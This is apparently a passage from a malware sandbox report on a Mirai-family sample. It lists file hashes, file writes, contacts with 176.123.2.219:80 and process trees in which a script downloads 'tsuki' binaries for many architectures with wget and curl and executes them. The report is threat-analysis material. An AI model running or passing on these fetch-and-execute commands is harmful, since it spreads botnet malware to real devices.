| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-22 00:14
Reported
2024-07-22 00:16
Platform
debian9-armhf-20240611-en
Max time kernel
21s
Max time network
23s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki | /tmp/no.sh | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
Processes
/tmp/no.sh
[/tmp/no.sh]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-22 00:14
Reported
2024-07-22 00:16
Platform
debian9-mipsbe-20240611-en
Max time kernel
55s
Max time network
58s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki | /tmp/no.sh | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
Processes
/tmp/no.sh
[/tmp/no.sh]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
